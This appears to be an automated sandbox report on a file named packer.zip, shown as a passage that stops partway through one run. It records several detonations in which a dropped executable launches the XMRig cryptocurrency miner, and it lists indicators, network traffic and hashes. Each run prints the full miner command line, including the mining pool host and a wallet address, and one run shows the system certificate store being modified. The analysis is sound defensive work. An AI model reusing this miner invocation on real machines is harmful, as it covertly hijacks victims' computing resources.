Analysis Overview
SHA256
2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Threat Level: Known bad
The file packer.zip was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
xmrig
Executes dropped EXE
Unsigned PE
Suspicious behavior: LoadsDriver
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Modifies system certificate store
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-27 17:21
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:11
Platform
win10v2004-20240426-en
Max time kernel
1792s
Max time network
1797s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1948 wrote to memory of 1276 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1948 wrote to memory of 1276 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.112.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1276-16-0x00000290EC440000-0x00000290EC460000-memory.dmp
memory/1276-17-0x00000290EDD40000-0x00000290EDD60000-memory.dmp
memory/1276-18-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-21-0x00000290EDD80000-0x00000290EDDA0000-memory.dmp
memory/1276-20-0x00000290EDD60000-0x00000290EDD80000-memory.dmp
memory/1276-19-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-22-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-23-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-24-0x00000290EDD60000-0x00000290EDD80000-memory.dmp
memory/1276-25-0x00000290EDD80000-0x00000290EDDA0000-memory.dmp
memory/1276-26-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-27-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-28-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-29-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-30-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-31-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-32-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-33-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-34-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-35-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-36-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-37-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-38-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-39-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-40-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-41-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-42-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-43-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-44-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-45-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-46-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-47-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-48-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-49-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-50-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-51-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-52-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-53-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-54-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-55-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-56-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-57-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-58-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-59-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-60-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-61-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-62-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-63-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-64-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-65-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-66-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-67-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-68-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-69-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-70-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-71-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-72-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-73-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-74-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-75-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-76-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-77-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-78-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-79-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-80-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-81-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-82-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-83-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-84-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:09
Platform
win10v2004-20240508-en
Max time kernel
1796s
Max time network
1806s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3952 wrote to memory of 1560 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3952 wrote to memory of 1560 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| NL | 23.62.61.171:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.171:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.64.52.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1560-16-0x000002B4F1E90000-0x000002B4F1EB0000-memory.dmp
memory/1560-17-0x000002B4F1ED0000-0x000002B4F1EF0000-memory.dmp
memory/1560-18-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-19-0x000002B4F1EF0000-0x000002B4F1F10000-memory.dmp
memory/1560-20-0x000002B4F1F10000-0x000002B4F1F30000-memory.dmp
memory/1560-21-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-22-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-23-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-25-0x000002B4F1F10000-0x000002B4F1F30000-memory.dmp
memory/1560-24-0x000002B4F1EF0000-0x000002B4F1F10000-memory.dmp
memory/1560-26-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-27-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-28-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-29-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-30-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-31-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-32-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-33-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-34-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-35-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-36-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-37-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-38-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-39-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-40-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-41-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-42-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-43-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-44-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-45-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-46-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-47-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-48-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-49-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-50-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-51-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-52-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-53-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-54-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-55-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-56-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-57-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-58-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-59-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-60-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-61-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-62-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-63-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-64-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-65-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-66-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-67-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-68-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-69-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-70-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-71-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-72-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-73-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-74-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-75-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-76-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-77-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-78-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-79-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-80-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-81-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-82-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-83-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-84-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:09
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob data elided in this copy of the report) | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob data elided in this copy of the report) | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1588 wrote to memory of 3944 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1588 wrote to memory of 3944 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.64.52.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3944-16-0x000001F518DF0000-0x000001F518E10000-memory.dmp
memory/3944-17-0x000001F518E30000-0x000001F518E50000-memory.dmp
memory/3944-18-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-20-0x000001F51A620000-0x000001F51A640000-memory.dmp
memory/3944-19-0x000001F51A600000-0x000001F51A620000-memory.dmp
memory/3944-21-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-22-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-23-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-24-0x000001F51A600000-0x000001F51A620000-memory.dmp
memory/3944-25-0x000001F51A620000-0x000001F51A640000-memory.dmp
memory/3944-26-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-27-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-28-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-29-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-30-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-31-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-32-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-33-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-34-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-35-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-36-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-37-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-38-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-39-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-40-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-41-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-42-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-43-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-44-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-45-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-46-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-47-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-48-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-49-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-50-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-51-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-52-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-53-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-54-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-55-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-56-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-57-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-58-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-59-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-60-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-61-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-62-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-63-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-64-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-65-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-66-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-67-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-68-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-69-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-70-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-71-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-72-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-73-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-74-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-75-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-76-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-77-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-78-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-79-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-80-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-81-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-82-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-83-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
memory/3944-84-0x00007FF645EC0000-0x00007FF6469C3000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:10
Platform
win10v2004-20240426-en
